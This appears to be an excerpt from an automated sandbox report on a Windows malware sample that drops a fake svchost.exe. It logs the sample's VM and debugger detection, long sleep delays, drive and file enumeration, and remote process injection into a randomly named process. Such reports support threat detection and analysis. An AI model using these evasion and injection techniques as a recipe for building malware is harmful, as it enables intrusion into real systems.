Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\apppatch\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\system\vmhgfs.DLL
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00401B20 rdtsc
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 3704
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 5561
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02BC79D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006A79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_006A79D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_014E79D0
Source: C:\Windows\apppatch\svchost.exe TID: 1268 Thread sleep count: 3704 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 1268 Thread sleep time: -370400s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7860 Thread sleep count: 70 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 3884 Thread sleep count: 52 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 1268 Thread sleep count: 5561 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 1268 Thread sleep time: -556100s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 3916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AD120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_006B9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_006BDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_006BDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AE6B0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00697680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_00697680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_014F9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014ED120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_014FDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_014FDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_014D7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014EE6B0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free
Source: svchost.exe, 00000002.00000002.2582821552.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sApps\vmhgfs.DLLll
Source: svchost.exe, 00000002.00000002.2583250453.0000000000812000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pindows\SYSTEM32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.2586584940.0000000000892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAW@
Source: svchost.exe, 00000002.00000002.2589120507.0000000002903000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2587567847.00000000008EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: C:\Windows\apppatch\svchost.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01360 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01360 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02A01000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00631360 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00631360 mov edx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00631000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_01471360 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_01471360 mov edx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_01471000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,FindCloseChangeNotification,IsBadWritePtr,0_2_00401150
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\apppatch\svchost.exe Memory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 630000 protect: page execute and read and write
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1470000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2170000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3040000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2560000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2620000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BD4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02BD4CC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_006B4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_006B4CC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014F4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_014F4CC0
Source: C:\Windows\apppatch\svchost.exe Thread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 631360
Source: C:\Windows\apppatch\svchost.exe Thread created: unknown EIP: 1FA1360
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtAllocateVirtualMemory: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtAdjustPrivilegesToken: Direct from: 0x77542EAC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtSetTimerEx: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtSetInformationThread: Direct from: 0x77542ECC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtTerminateThread: Direct from: 0x77542FCC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe NtQueryValueKey: Direct from: 0x77542BEC
